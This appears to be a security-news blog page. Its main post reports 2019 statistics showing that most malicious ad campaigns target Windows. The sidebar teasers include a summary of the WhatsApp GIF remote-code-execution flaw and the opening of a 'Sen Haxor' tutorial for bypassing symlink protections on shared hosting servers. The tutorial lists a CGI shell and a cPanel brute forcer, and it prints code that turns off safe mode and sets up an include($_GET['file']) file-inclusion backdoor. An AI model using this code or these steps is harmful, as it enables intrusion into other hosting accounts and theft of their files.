Skip to main content

More than 60% of Malicious Ads Targeting Windows Computer Systems – Windows Users Beware!

% of Malicous ADS By Device OS Windows Hacked

A new report shows that 61% of malicious ads on the Internet targeting Windows computers to infect with malware or to steal the information.
The malicious ads act as a platform to distribute malware, by attracting users and redirect them to malicious websites which results in downloading the malware.

Windows as Prime Target

According to Devcon observation between July 11 – November 22, 2019, 61% of the malicious ad campaigns primarily targeting the Windows operating system, when compared to other popular operating systems.
Next to the Windows operating system, the second most targeted operating system in ChromeOS which accounts for 22.5%, next is MacOS at 10.5% and the least targeted device is Apple iPads at 0.8%.
malicious ads
Malicious Ads Source: DEVCON
In another report published by Confiant, the malicious ads increased from Q2 to Q3. The Q3 attacks are targeting desktop computers, mainly running Windows and they are attacking users mainly in Italy, Spain, and Scandinavia.
The Windows operating is the most used one, it’s popularity let malware authors invest more time and resource to develop a more sophisticated malware. Wannacry is an example of it.
We can’t assume Linux OS is the most secured one, nowadays attackers targeting Linux servers also to install various malware, most particularly coin miner scripts.
With Q3 three different variations of ads observed
Malicious ad – Ads with Javascript that force redirection to another website.
In-Banner Video (IBV) ad – Serving Video ads with banner placements.
Low-Quality ad – Noisy ads based on user location
Researchers believe that “nearly 1 in every 250 impressions is dangerous or disruptive to the end-user, which equates to 4 billion malicious or disruptive impressions a month across the entire industry.”



Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h...

How to Hack WhatsApp using just a GIF

A picture is worth a thousand words, but a GIF is worth a thousand pictures. Today, the short looping clips, GIFs are everywhere—on your social media, on your message boards, on your chats, helping users perfectly express their emotions, making people laugh, and reliving a highlight. But what if an innocent-looking GIF greeting with Good morning, Happy Birthday, or Merry Christmas message hacks your smartphone? Well, not a theoretical idea anymore. WhatsApp has recently patched a critical security vulnerability in its app for Android, which remained unpatched for at least 3 months after being discovered, and if exploited, could have allowed remote hackers to compromise Android devices and potentially steal files and chat messages. WhatsApp Remote Code Execution Vulnerability The vulnerability, tracked as  CVE-2019-11932 , is a double-free memory corruption bug that doesn't actually reside in the WhatsApp code itself, but in an open-source GIF image parsing library that What...

|Bypass Symlink on 2013 Server With Different .htaccess and Methods by Sen Haxor |

Hi, Guys,  Please a wonderfull tutorial provided bt Sem;\  Today I gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods. So let's Get Started :) Note: This method is not applicable for Godaddy, Bluehost, Hostgator and Hostmonstor Servers. For This First You Need the Following Files : 1 -> Sen Haxor CGI Shell 2 -> sen.zip 3 -> passwd-bypass.php 4 -> Turbo Brute force Cpanel 5 - > Port.py First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server . Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php with <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo...